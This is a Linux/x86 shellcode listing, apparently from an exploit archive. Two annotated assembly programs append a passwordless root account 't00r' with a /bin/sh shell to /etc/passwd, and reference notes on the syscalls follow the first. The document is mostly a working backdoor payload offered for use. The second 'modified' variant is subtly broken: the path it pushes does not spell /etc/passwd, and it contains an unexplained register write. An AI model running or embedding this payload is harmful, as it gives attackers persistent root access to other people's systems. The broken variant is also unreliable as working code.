Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)

Reference: Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)
shellcode.asm
;-----------------------------------------------------------------------
; Linux/x86 (i386) shellcode: append a UID 0 / GID 0 passwd entry for
; user "t00r" to /etc/passwd. Flat script, NASM syntax, entered at _start.
; Syscall convention used throughout: eax = syscall number, arguments in
; ebx, ecx, edx, trap with int 0x80, result in eax.
; Sequence (decoded from the code below):
;   open("//etc/passwd", O_RDWR) -> lseek(fd, 0, SEEK_END)
;   -> write(fd, "t00r::0:0::/:/bin/sh", 20) -> close(fd) -> exit(fd)
; There is no error path: every step assumes the previous syscall
; succeeded and that the relevant registers are preserved across the trap.
; Defender note: the persistent effect is a single appended line in
; /etc/passwd; file-integrity monitoring of /etc/passwd or an audit rule
; on writes to that file observes this directly.
;-----------------------------------------------------------------------
global _start

section .text
_start:
xor eax, eax
push eax ; NUL terminator for the path string
push 0x64777373 ; "sswd"
push 0x61702f63 ; "c/pa"
push 0x74652f2f ; "//et" -> esp now points at "//etc/passwd\0"
mov ebx, esp ; ebx = pathname
lea ecx, [eax+0x2] ; ecx = 2 = O_RDWR (eax is 0, so this is just mov ecx, 2)
lea eax, [eax+0x5] ; eax = 5 = sys_open
int 0x80 ; open("//etc/passwd", O_RDWR); edx (mode) is ignored without O_CREAT

mov ebx, eax ; ebx = fd (assumes open succeeded: a small non-negative value)
xchg edx, ecx ; edx = 2 = SEEK_END; ecx receives the old edx and is cleared next
xor ecx, ecx ; ecx = 0 = offset
mov al, 0x13 ; eax = 19 = sys_lseek (upper bytes of eax are 0 only while eax held a small fd)
int 0x80 ; lseek(fd, 0, SEEK_END): position the offset at end of file

push ecx ; 0: padding after the entry (not part of the 20 bytes written)
push 0x68732f6e ; "n/sh"
push 0x69622f3a ; ":/bi"
push 0x2f3a3a30 ; "0::/"
push 0x3a303a3a ; "::0:"
push 0x72303074 ; "t00r" -> esp points at "t00r::0:0::/:/bin/sh"
lea eax,[ecx+0x4] ; eax = 4 = sys_write (ecx is still 0)
mov ecx,esp ; ecx = buffer address
mov dl,0x14 ; edx = 20 = byte count (edx was 2, so only the low byte is changed)
int 0x80 ; write(fd, address of the payload, 20)

xor eax, eax
mov al, 0x6 ; eax = 6 = sys_close
; ebx: fd (unchanged since the open call)
int 0x80 ; close(fd)

inc eax ; eax = 1 = sys_exit, relying on close() having returned 0 in eax
int 0x80 ; exit(ebx): the exit status is the fd number

open(2) flags: O_RDWR (no O_CREAT, so the mode argument passed in edx is ignored)

man 2 open:

The mode argument specifies the file mode bits to be applied when a new file is created. If neither O_CREAT nor O_TMPFILE is specified in flags, then mode is ignored (and can thus be specified as 0, or simply omitted).

lseek:

lseek
#include <sys/types.h>
#include <unistd.h>

/* Repositions the file offset of fd; whence selects the base (SEEK_SET,
 * SEEK_CUR or SEEK_END). The listing above invokes it as i386 syscall
 * 0x13 (19) with offset 0 and SEEK_END, i.e. it seeks to end of file. */
off_t lseek(int fd, off_t offset, int whence);

lseek(2) whence values:

  • SEEK_SET (0x0)
  • SEEK_CUR (0x1)
  • SEEK_END (0x2)

close:

close
#include <unistd.h>

/* Closes fd. The listing above invokes it as i386 syscall 6 with the
 * descriptor still in ebx from the open call. */
int close(int fd);

Here's the modified version, which only adds a trailing newline to the written entry:

shellcode-2.asm
;-----------------------------------------------------------------------
; Variant of the first listing: same flow (open -> lseek -> write ->
; close -> exit), but the written entry ends with a newline, so the write
; count is 21 instead of 20. NASM syntax, Linux i386 int 0x80 ABI
; (eax = syscall number, args in ebx, ecx, edx).
; Same caveat as above: no error checking between syscalls.
;-----------------------------------------------------------------------
global _start

section .text
_start:
mov dx, 0xff ; 16-bit write, sets only the low half of edx; edx is open's mode argument, which open ignores without O_CREAT, so the purpose of this value is not stated
xor eax, eax
push eax ; NUL terminator for the path string
push 0x77777373 ; "ssww" -- NOTE(review): this dword differs from the first listing's "sswd", so the pushed path does not spell "//etc/passwd"
push 0x61702f63 ; "c/pa"
push 0x74652f2f ; "//et"
mov ebx, esp ; ebx = pathname
lea ecx, [eax+0x2] ; ecx = 2 = O_RDWR (eax is 0)
lea eax, [eax+0x5] ; eax = 5 = sys_open
int 0x80 ; open(pathname, O_RDWR, mode)

mov ebx, eax ; ebx = fd (assumes open succeeded)
xchg edx, ecx ; edx = 2 = SEEK_END; ecx receives the old edx and is cleared next
xor ecx, ecx ; ecx = 0 = offset
mov al, 0x13 ; eax = 19 = sys_lseek (upper bytes of eax assumed 0 from a small fd)
int 0x80 ; lseek(fd, 0, SEEK_END)

push ecx ; 0: padding after the entry (not part of the bytes written)
xor eax, eax
mov al, 0x0a
push eax ; "\n\0\0\0": the newline immediately follows the entry, the rest is padding
push 0x68732f6e ; "n/sh"
push 0x69622f3a ; ":/bi"
push 0x2f3a3a30 ; "0::/"
push 0x3a303a3a ; "::0:"
push 0x72303074 ; "t00r" -> esp points at "t00r::0:0::/:/bin/sh\n"
lea eax,[ecx+0x4] ; eax = 4 = sys_write (ecx is still 0)
mov ecx,esp ; ecx = buffer address
mov dl,0x15 ; edx = 21 = 20 entry bytes + the newline (edx was 2)
int 0x80 ; write(fd, buffer, 21)

xor eax, eax
mov al, 0x6 ; eax = 6 = sys_close
int 0x80 ; close(fd); ebx still holds the fd

inc eax ; eax = 1 = sys_exit, relying on close() having returned 0 in eax
int 0x80 ; exit(ebx): the exit status is the fd number